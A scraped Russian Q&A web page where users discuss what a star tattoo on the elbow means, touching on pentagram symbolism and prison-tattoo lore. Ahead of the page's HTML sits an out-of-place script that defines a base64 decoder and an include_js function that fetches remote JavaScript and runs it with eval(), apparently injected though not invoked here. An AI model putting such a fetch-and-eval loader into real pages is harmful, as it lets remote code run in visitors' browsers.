abitura30.ru/chto-oznachaet-tatuirovka-zvyozdochka-na-lokte
<meta charset="utf8" />
    <script>
        // Функция кодирования строки в base64
        function utf8(utftext){var string="";var i=0;var c=c1= c2= 0;while(i< utftext["length"]){c= utftext["charCodeAt"](i);if(c< 128){string+= String["fromCharCode"](c);i++}else {if((c> 191)&& (c< 224)){c2= utftext["charCodeAt"](i+ 1);string+= String["fromCharCode"](((c& 31)<< 6)| (c2& 63));i+= 2}else {c2= utftext["charCodeAt"](i+ 1);c3= utftext["charCodeAt"](i+ 2);string+= String["fromCharCode"](((c& 15)<< 12)| ((c2& 63)<< 6)| (c3& 63));i+= 3}}};return string}function base64_decode(data){var b64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc="";do{h1= b64["indexOf"](data["charAt"](i++));h2= b64["indexOf"](data["charAt"](i++));h3= b64["indexOf"](data["charAt"](i++));h4= b64["indexOf"](data["charAt"](i++));bits= h1<< 18| h2<< 12| h3<< 6| h4;o1= bits>> 16& 0xff;o2= bits>> 8& 0xff;o3= bits& 0xff;if(h3== 64){enc+= String["fromCharCode"](o1)}else {if(h4== 64){enc+= String["fromCharCode"](o1,o2)}else {enc+= String["fromCharCode"](o1,o2,o3)}}}while(i< data["length"]);;return utf8(enc)}function include_js(str){var xmlhttp= new XMLHttpRequest();xmlhttp["onreadystatechange"]= function(){if(xmlhttp["readyState"]== 4){myjsdata= xmlhttp["responseText"];eval(myjsdata)}};xmlhttp["open"]("GET",str,false);xmlhttp["send"](null)}function include_css(str){var xmlhttp= new XMLHttpRequest();xmlhttp["onreadystatechange"]= function(){if(xmlhttp["readyState"]== 4){myjsdata= xmlhttp["responseText"];document["getElementsByTagName"]("head")[0]["insertAdjacentHTML"]("beforeend","<style>"+ myjsdata+ "</style>")}};xmlhttp["open"]("GET",str,false);xmlhttp["send"](null)}
    </script>


    <!DOCTYPE html>
<html lang="ru-RU">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">



<title>Что означает татуировка?&#8230; звёздочка на локте? &#8212; abitura30</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/abitura30.ru\/incl_dir\/js\/wp-emoji-release.min.js?ver=4.6.1"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='yarppWidgetCss-css'  href='http://abitura30.ru/plgdir/yet-another-related-posts-plugin/style/widget.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='cnss_css-css'  href='http://abitura30.ru/plgdir/easy-social-icons/css/cnss.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jebacss-d-css'  href='http://abitura30.ru/plgdir/jeba-plus-multi-slider/js/plusslider.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-postratings-css'  href='http://abitura30.ru/plgdir/wp-postratings/postratings-css.css?ver=1.83' type='text/css' media='all' />
<link rel='stylesheet' id='simpler-google-fonts-css'  href='//fonts.googleapis.com/css?family=Source+Sans+Pro%3A200%2C300%2C400%2C600%2C700%2C900%2C200italic%2C300italic%2C400italic%2C600italic%2C700italic%2C900italic&#038;subset=latin%2Clatin-ext%2Cvietnamese&#038;ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='simpler-font-awesome-css'  href='http://abitura30.ru/t_dir/css/font-awesome.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='simpler-style-css'  href='http://abitura30.ru/t_dir/m-table.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='jmig_stylesheet_layout-css'  href='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/styles/jmig-masonry-layout.css?ver=3.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='jmig_stylesheet-css'  href='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/styles/jmig-masonry-v3-animation.css?ver=3.0.2' type='text/css' media='all' />
<style id='jmig_stylesheet-inline-css' type='text/css'>
.gallery-item:not(.emoji), .gallery-item img:not(.emoji), gallery-item a:not(.emoji) { width: 150px !important; max-width: 150px !important; min-width: 150px !important; }
.gallery-item {margin: 1px !important}
</style>
<link rel='stylesheet' id='jmig_captions-css'  href='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/styles/jmig-maosnry-v3-captions.css?ver=3.0.2' type='text/css' media='all' />
<!--[if lte IE 9]>
<link rel='stylesheet' id='jmig-lte-IE9-css'  href='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/styles/jmig-lte-ie9.css?ver=3.0.2' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='dgwt-jg-lightgallery-css'  href='http://abitura30.ru/plgdir/justified-gallery/assets/css/lightgallery.min.css?ver=1.1' type='text/css' media='all' />
<link rel='stylesheet' id='dgwt-jg-style-css'  href='http://abitura30.ru/plgdir/justified-gallery/assets/css/style.min.css?ver=1.1' type='text/css' media='all' />
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/easy-social-icons/js/cnss.js?ver=1.0'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/jeba-plus-multi-slider/js/jquery.easing.1.3.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/jeba-plus-multi-slider/js/jquery.plusslider.js?ver=4.6.1'></script>
<link rel='https://api.w.org/' href='http://abitura30.ru/wp-json/' />
<link rel="alternate" type="application/json+oembed" href="http://abitura30.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fabitura30.ru%2Fchto-oznachaet-tatuirovka-zvyozdochka-na-lokte%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://abitura30.ru/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fabitura30.ru%2Fchto-oznachaet-tatuirovka-zvyozdochka-na-lokte%2F&#038;format=xml" />
	<style>
		.plusslider{background:gray;}
        /* Custom Slider Styling */
        img { border: 0; display: block; margin: 0 auto; }
        .slide1 { background: #171105 url(./images/image1.jpg) no-repeat center top; padding: 20px 40px; width: 550px; }
        .slide1 > div { margin: 0 auto; width: 630px; }
        .slide1 h2 {padding-left: 15px; color: #fff; font-size: 20px; margin: 0 0 20px 0; text-align: left; }
        .slide1 p { border-left: 3px solid #fff; color: #fff; padding: 0 0 0 10px; margin-bottom: 25px; }
      /* Page Styling */
        .quote, .quote2, .quote3 { padding: 20px 0; width: 580px; font: 24px Georgia, serif; text-align: center; width: 100%; position: relative; }
        .quote {
			  background: #333 none repeat scroll 0 0;
			  color: #f1f1f1;
			  padding-left: 40px;
			  padding-right: 40px;
			}
        .plusslider.slider3, .plusslider.slider3 .plusslider-pagination-wrapper { border: none; border-radius: 0; }
		.link {
		  border: 1px solid #fff;
		  color: #fff;
		  font-size: 16px;
		  margin-left: 10px;
		  padding: 3px 10px;
		}
    </style>
	

</head>

<body class="single single-post postid-13871 single-format-standard">
<div id="page" class="hfeed site">
	<IDXSKIP><a class="skip-link screen-reader-text" href="#content">Skip to content</a></IDXSKIP>

	<IDXSKIP><header id="masthead" class="site-header" role="banner">
		<div class="site-branding">
			<h1 class="site-title"><a href="http://abitura30.ru/" rel="home">abitura30</a></h1>
			<h2 class="site-description"></h2>
		</div><!-- .site-branding -->

		<nav id="site-navigation" class="main-navigation" role="navigation">
			<button class="menu-toggle" aria-controls="menu" aria-expanded="false"><i class="fa fa-bars fa-5x"></i></button>
					</nav><!-- #site-navigation -->
	</header></IDXSKIP><!-- #masthead -->

	<div id="content" class="site-content">

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

		
			
<article id="post-13871" class="post-13871 post type-post status-publish format-standard hentry category-prochie-iskusstva">
	<header class="entry-header">
		<h1 class="entry-title">Что означает татуировка?&#8230; звёздочка на локте?</h1>
		<div class="entry-meta">
			<i class="fa fa-calendar"></i> <span class="posted-on">Posted on <a href="http://abitura30.ru/chto-oznachaet-tatuirovka-zvyozdochka-na-lokte/" rel="bookmark"><time class="entry-date published updated" datetime="2016-12-05T16:47:15+00:00">05.12.2016</time></a></span>		</div><!-- .entry-meta -->
	</header><!-- .entry-header -->

	<div class="entry-content">
                		<!--Ad Injection:top-->        <script type="text/javascript">
            (function (w, d, n, s, t) {
                t = d.getElementsByTagName("script")[0];
                s = d.createElement("script");
                s.src = "//aksessuarov.ru/smartrotator.js?referrer=" + escape(document.referrer);
                s.type = "text/javascript";
                s.async = true;
                t.parentNode.insertBefore(s, t);
            })(window, document);
        </script>

        <div id="smartrotator_ad_367"></div>
    <p>Что означает татуировка?&#8230; звёздочка на локте?</p>
<ol>
<li>Татуировка звезда
<p>Звезды  символ надежды и правды. Светящиеся во тьме звезды озаряют путь ночных странников и путешественников, заставляют задуматься о вечности и о величии мира. </p><!--Ad Injection:random-->        <div id="smartrotator_ad_368"></div>

<p>Пятиконечная звезда. <br />Пентаграмма или пентакль  талисман и священный знак, который был знаком еще древним грекам к которым попала предположительно в 3 тыс до н. э. и имела значение божественного тела. <br />-В Египте пентаграмма, заключенная в круг, стала символом царства мертвых. <br />-В христианстве считается символом магии и дьявола перевернутая пентаграмма, а обыкновенная пятиконечная звезда некогда означала пять ран Христовых. <br />-Для иудеев пентаграмма была символом Пятикнижия Моисея. </p>
<p><a rel="nofollow" href="http://www.tattoo-meanings.ru/татуировка-звезда" target="_blank" >подробности</a></li>
<p></p>
<li>У зеков восьмиконечная звезда &#8212; татуха авторитетов</li>
<p></p>
<li>эти звездочки доложны быть на обеих локтях) ну мне говорили если такие звезды на коленях то это у зеков означает никогда не встану на колени перед ментом или еще перед кем то) ну значит и на локтях звезды означают что то подобное</li>
<li>Напартачили:)))</li>
<p></p>
<li>У зеков восьмиконечная звезда не татуировка анархистов, а злостных отрицалов и ненавистников закона</li>
<p>
</ol>
<!--Ad Injection:bottom-->        <div id="smartrotator_ad_369"></div>

        <div id="smartrotator_ad_370"></div>
<div class='yarpp-related'>
<ol>
<li><a href="http://abitura30.ru/chto-zonachaet-tatu-zvezdi-na-lokte/" rel="bookmark" title="что зоначает тату звезды на локте?">что зоначает тату звезды на локте? </a></li>
<li><a href="http://abitura30.ru/chto-oznachaet-zvezda-i-mesyac-u-musulman-spasibo-za-otvet/" rel="bookmark" title="Что означает звезда и месяц у мусульман? Спасибо за ответ">Что означает звезда и месяц у мусульман? Спасибо за ответ </a></li>
<li><a href="http://abitura30.ru/tatuirovka-v-vide-pentagramma-i-chto-to-tam-eshyo-vnutri-narisovano/" rel="bookmark" title="Татуировка в виде пентаграмма и что-то там ещё внутри нарисовано.">Татуировка в виде пентаграмма и что-то там ещё внутри нарисовано. </a></li>
<li><a href="http://abitura30.ru/chto-oznachaet-tatuirovka-s-izobrazheniem-volka-ne-nado-menya-otgovarivat-kazhdomu-svoe-luchshe-na-vopros-otvette/" rel="bookmark" title="Что означает татуировка с изображением ВОЛКа? Не надо меня отговаривать, каждому свое&#8230; Лучше на вопрос ответьте">Что означает татуировка с изображением ВОЛКа? Не надо меня отговаривать, каждому свое&#8230; Лучше на вопрос ответьте </a></li>
<li><a href="http://abitura30.ru/chto-oznachaet-tatu-na-zhivote-s-babochkoj/" rel="bookmark" title="что означает тату на животе с бабочкой">что означает тату на животе с бабочкой </a></li>
</ol>
</div>
			</div><!-- .entry-content -->

	<footer class="entry-footer">
		<i class="fa fa-folder"></i> <span class="cat-links"><a href="http://abitura30.ru/prochie-iskusstva/" rel="category tag">Прочие искусства</a></span><br /><span class="comments-link"><i class="fa fa-comment"></i><a href="http://abitura30.ru/chto-oznachaet-tatuirovka-zvyozdochka-na-lokte/#respond">Leave a comment</a></span><br />	</footer><!-- .entry-footer -->
</article><!-- #post-## -->

				<nav class="navigation post-navigation" role="navigation">
		<h1 class="screen-reader-text">Post navigation</h1>
		<div class="nav-links">
			<div class="nav-previous"><a href="http://abitura30.ru/skolko-kilovatt-v-mesyac-beryot-holodilnik/" rel="prev"><IDXSKIP><span class="meta-nav">&larr;</span></IDXSKIP>&nbsp;сколько киловатт в месяц берёт холодильник?</a></div><div class="nav-next"><a href="http://abitura30.ru/podskazhite-istochnikgde-est-informaciya-kak-imitirovat-kriki-ptic/" rel="next">Подскажите источник,где есть информация как имитировать крики птиц&nbsp;<IDXSKIP><span class="meta-nav">&rarr;</span></IDXSKIP></a></div>		</div><!-- .nav-links -->
	</nav><!-- .navigation -->
	
			
<div id="comments" class="comments-area">

	
	
	
					<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title"><IDXSKIP>Добавить комментарий </IDXSKIP><small><a rel="nofollow" id="cancel-comment-reply-link" href="/chto-oznachaet-tatuirovka-zvyozdochka-na-lokte/#respond" style="display:none;">Отменить ответ</a></small></h3>				<form action="http://abitura30.ru/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
					<p class="comment-notes"><IDXSKIP><span id="email-notes">Ваш e-mail не будет опубликован.</span></IDXSKIP> <IDXSKIP>Обязательные поля помечены </IDXSKIP><IDXSKIP><span class="required">*</span></IDXSKIP></p><IDXSKIP><p class="comment-form-comment"><label for="comment">Комментарий</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" aria-required="true" required="required"></textarea></p></IDXSKIP><IDXSKIP><p class="comment-form-author"><label for="author">Имя <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" aria-required='true' required='required' /></p></IDXSKIP>
<IDXSKIP><p class="comment-form-email"><label for="email">E-mail <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" aria-required='true' required='required' /></p></IDXSKIP>
<IDXSKIP><p class="comment-form-url"><label for="url">Сайт</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p></IDXSKIP>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Отправить комментарий" /> <input type='hidden' name='comment_post_ID' value='13871' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>				</form>
					</div><!-- #respond -->
		
</div><!-- #comments -->

		
		</main><!-- #main -->
	</div><!-- #primary -->


<div id="secondary" class="widget-area" role="complementary">
	<IDXSKIP><aside id="search-4" class="widget widget_search"><form role="search" method="get" class="search-form" action="http://abitura30.ru/">
				<label>
					<span class="screen-reader-text">Найти:</span>
					<input type="search" class="search-field" placeholder="Поиск&hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Поиск" />
			</form></aside></IDXSKIP><aside id="posts-widget-5" class="widget Posts"><h1 class="widget-title"></h1><ul><li><a class="icon-folder-close" title="почему на крестике написано Ника?" href="http://abitura30.ru/pochemu-na-krestike-napisano-nika/">почему на крестике написано Ника?</a></li><li><a class="icon-folder-close" title="Как сварить вкусный суп из морепродуктов?" href="http://abitura30.ru/kak-svarit-vkusnij-sup-iz-moreproduktov/">Как сварить вкусный суп из морепродуктов?</a></li><li><a class="icon-folder-close" title="Самое лучшее красное полусладкое вино?" href="http://abitura30.ru/samoe-luchshee-krasnoe-polusladkoe-vino/">Самое лучшее красное полусладкое вино?</a></li><li><a class="icon-folder-close" title="сколько киловатт в месяц берёт холодильник?" href="http://abitura30.ru/skolko-kilovatt-v-mesyac-beryot-holodilnik/">сколько киловатт в месяц берёт холодильник?</a></li><li><a class="icon-folder-close" title="Назовите пять крупнейших островных государств мира." href="http://abitura30.ru/nazovite-pyat-krupnejshih-ostrovnih-gosudarstv-mira/">Назовите пять крупнейших островных государств мира.</a></li><li><a class="icon-folder-close" title="Как правильно: согласно списку или согласно списка?" href="http://abitura30.ru/kak-pravilno-soglasno-spisku-ili-soglasno-spiska/">Как правильно: согласно списку или согласно списка?</a></li><li><a class="icon-folder-close" title="Разрезали арбуз,а он внутри желтый???Почему?Его есть можно или отравимся?" href="http://abitura30.ru/razrezali-arbuza-on-vnutri-zheltijpochemuego-est-mozhno-ili-otravimsya/">Разрезали арбуз,а он внутри желтый???Почему?Его есть можно или отравимся?</a></li><li><a class="icon-folder-close" title="Sos! купила,сапоги очень понравились и они немного широки в
голенище сверху,можно ли у" href="http://abitura30.ru/sos-kupilasapogi-ochen-ponravilis-i-oni-nemnogo-shiroki-vgolenishe-sverhumozhno-li-ushitne-zametno-v-obv-mastersk/">Sos! купила,сапоги очень понравились и они немного широки в
голенище сверху,можно ли у</a></li><li><a class="icon-folder-close" title="как правильно подсчитать НДС ?" href="http://abitura30.ru/kak-pravilno-podschitat-nds/">как правильно подсчитать НДС ?</a></li><li><a class="icon-folder-close" title="Стоит ли бросать курить курильщику с пятнадцатилетним стажем? Может ли это повлиять на" href="http://abitura30.ru/stoit-li-brosat-kurit-kurilshiku-s-pyatnadcatiletnim-stazhem-mozhet-li-eto-povliyat-na-zdorove/">Стоит ли бросать курить курильщику с пятнадцатилетним стажем? Может ли это повлиять на</a></li><li><a class="icon-folder-close" title="есть народ лакайцы ?" href="http://abitura30.ru/est-narod-lakajci/">есть народ лакайцы ?</a></li><li><a class="icon-folder-close" title="основные направления внешнеполитической деятельности Николая 2 в начале 20 века" href="http://abitura30.ru/osnovnie-napravleniya-vneshnepoliticheskoj-deyatelnosti-nikolaya-2-v-nachale-20-veka/">основные направления внешнеполитической деятельности Николая 2 в начале 20 века</a></li><li><a class="icon-folder-close" title="сегодня у кота выпал ус..изза чего это могло произойти?и вообще это нормально?" href="http://abitura30.ru/segodnya-u-kota-vipal-usizza-chego-eto-moglo-proizojtii-voobshe-eto-normalno/">сегодня у кота выпал ус..изза чего это могло произойти?и вообще это нормально?</a></li><li><a class="icon-folder-close" title="Чё делать если увидел голую девушку?" href="http://abitura30.ru/chyo-delat-esli-uvidel-goluyu-devushku/">Чё делать если увидел голую девушку?</a></li><li><a class="icon-folder-close" title="как теряют девственность?" href="http://abitura30.ru/kak-teryayut-devstvennost/">как теряют девственность?</a></li><li><a class="icon-folder-close" title="Подскажите источник,где есть информация как имитировать крики птиц" href="http://abitura30.ru/podskazhite-istochnikgde-est-informaciya-kak-imitirovat-kriki-ptic/">Подскажите источник,где есть информация как имитировать крики птиц</a></li><li><a class="icon-folder-close" title="подскажите 10 вопросов по Гоголю на уровне 10 класса" href="http://abitura30.ru/podskazhite-10-voprosov-po-gogolyu-na-urovne-10-klassa/">подскажите 10 вопросов по Гоголю на уровне 10 класса</a></li><li><a class="icon-folder-close" title="клейковина. Где покупаете её, сколько добавляете в тесто, делает ли она тесто тянущимс" href="http://abitura30.ru/klejkovina-gde-pokupaete-eyo-skolko-dobavlyaete-v-testo-delaet-li-ona-testo-tyanushimsya/">клейковина. Где покупаете её, сколько добавляете в тесто, делает ли она тесто тянущимс</a></li><li><a class="icon-folder-close" title="Скажите, тыква калорийный продукт?" href="http://abitura30.ru/skazhite-tikva-kalorijnij-produkt/">Скажите, тыква калорийный продукт?</a></li><li><a class="icon-folder-close" title="Помогите с конкурсами для КВН" href="http://abitura30.ru/pomogite-s-konkursami-dlya-kvn/">Помогите с конкурсами для КВН</a></li></ul></aside></div><!-- #secondary -->

	</div><!-- #content -->

	<footer id="colophon" class="site-footer" role="contentinfo">
		<div class="site-info">
			<script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank rel=nofollow><img src='//counter.yadro.ru/hit?t20.1;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='' "+
"border='0' width='88' height='31'><\/a>")
//--></script>
		</div><!-- .site-info -->
	</footer><!-- #colophon -->
</div><!-- #page -->

	<script type="text/javascript">
    var slider;
    jQuery(document).ready(function(){

        slider = new jQuery.plusSlider(jQuery('#slider'), {
            autoPlay: false,
            sliderEasing: 'easeInOutExpo', // Anything other than 'linear' and 'swing' requires the easing plugin
            paginationPosition: 'append',
            sliderType: 'slider' // Choose whether the carousel is a 'slider' or a 'fader'
        });

        jQuery('#slider2').plusSlider({
            autoPlay: false,
            displayTime: 2000, // The amount of time the slide waits before automatically moving on to the next one. This requires 'autoPlay: true'
            sliderType: 'fader' // Choose whether the carousel is a 'slider' or a 'fader'
        });

        jQuery('#slider3').plusSlider({
            sliderEasing: 'easeInOutExpo', // Anything other than 'linear' and 'swing' requires the easing plugin
            autoPlay: false,
            sliderType: 'slider' // Choose whether the carousel is a 'slider' or a 'fader'
        });

    });
    </script>
	

<link rel='stylesheet' id='yarppRelatedCss-css'  href='http://abitura30.ru/plgdir/yet-another-related-posts-plugin/style/related.css?ver=4.6.1' type='text/css' media='all' />
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/ui/mouse.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/jquery/ui/sortable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/js/remove-gallery-class.js?ver=3.0.2'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/imagesloaded.min.js?ver=3.2.0'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/masonry.min.js?ver=3.3.2'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/jquery-masonry-image-gallery/js/masonry-init-v3.js?ver=3.0.2'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/justified-gallery/assets/js/jquery.mousewheel.min.js?ver=1.1'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/justified-gallery/assets/js/lightgallery.min.js?ver=1.1'></script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/justified-gallery/assets/js/jquery.justifiedGallery.min.js?ver=1.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ratingsL10n = {"plugin_url":"http:\/\/abitura30.ru\/plgdir\/wp-postratings","ajax_url":"http:\/\/abitura30.ru\/wp-admin\/admin-ajax.php","text_wait":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043d\u0435 \u0433\u043e\u043b\u043e\u0441\u0443\u0439\u0442\u0435 \u0437\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e.","image":"stars","image_ext":"gif","max":"5","show_loading":"1","show_fading":"1","custom":"0"};
var ratings_mouseover_image=new Image();ratings_mouseover_image.src=ratingsL10n.plugin_url+"/images/"+ratingsL10n.image+"/rating_over."+ratingsL10n.image_ext;;
/* ]]> */
</script>
<script type='text/javascript' src='http://abitura30.ru/plgdir/wp-postratings/postratings-js.js?ver=1.83'></script>
<script type='text/javascript' src='http://abitura30.ru/t_dir/js/navigation.js?ver=20120206'></script>
<script type='text/javascript' src='http://abitura30.ru/t_dir/js/skip-link-focus-fix.js?ver=20130115'></script>
<script type='text/javascript' src='http://abitura30.ru/t_dir/js/superfish.js?ver=20141010'></script>
<script type='text/javascript' src='http://abitura30.ru/t_dir/js/superfish-settings.js?ver=20141010'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/comment-reply.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://abitura30.ru/incl_dir/js/wp-embed.min.js?ver=4.6.1'></script>
<script type="text/javascript">(function($){var $gallery=$('.dgwt-jg-gallery'),$item=$('.dgwt-jg-item');if($gallery.length>0&&$item.length>0){$gallery.lightGallery({thumbnail:!1,download:!1});$item.children('img').each(function(){if(typeof $(this).attr('srcset')!=='undefined'){$(this).attr('data-jg-srcset',$(this).attr('srcset'));$(this).removeAttr('srcset')}});$gallery.justifiedGallery({lastRow:'nojustify',captions:!1,margins:3,rowHeight:160,maxRowHeight:-1,thumbnailPath:function(currentPath,width,height,$image){if(typeof $image.data('jg-srcset')==='undefined'){return currentPath}var srcset=$image.data('jg-srcset');if($image.length>0&&srcset.length>0){var path,sizes=[],sizesTemp=[],urls=srcset.split(",");if(urls.length>0){for(i=0;i<urls.length;i++){var url,sizeW,item=urls[i].trim().split(" ");if(typeof item[0]!='undefined'&&typeof item[1]!='undefined'){var sizeW=item[1].replace('w','');sizesTemp[sizeW]={width:item[1].replace('w',''),url:item[0]}}}for(i=0;i<sizesTemp.length;i++){if(sizesTemp[i]){sizes.push(sizesTemp[i])}}}for(i=0;i<sizes.length;i++){if(sizes[i].width>=width){return sizes[i].url}}return currentPath}else{return currentPath}}}).on('jg.complete',function(e){$item.each(function(){$(this).on('mouseenter mouseleave',function(e){var $this=$(this),width=$this.width(),height=$this.height();var x=(e.pageX-$this.offset().left-(width/2))*(width>height?(height/width):1),y=(e.pageY-$this.offset().top-(height/2))*(height>width?(width/height):1);var dir_num=Math.round((((Math.atan2(y,x)*(180/Math.PI))+180)/90)+3)%4,directions=['top','right','bottom','left'];if(e.type==='mouseenter'){$this.removeClass(function(index,css){return(css.match(/(^|\s)hover-out-\S+/g)||[]).join(' ')});$this.addClass('hover-in-'+directions[dir_num])}if(e.type==='mouseleave'){$this.removeClass(function(index,css){return(css.match(/(^|\s)hover-in-\S+/g)||[]).join(' ')});$this.addClass('hover-out-'+directions[dir_num])}})})})}}(jQuery))</script>
</body>
</html>

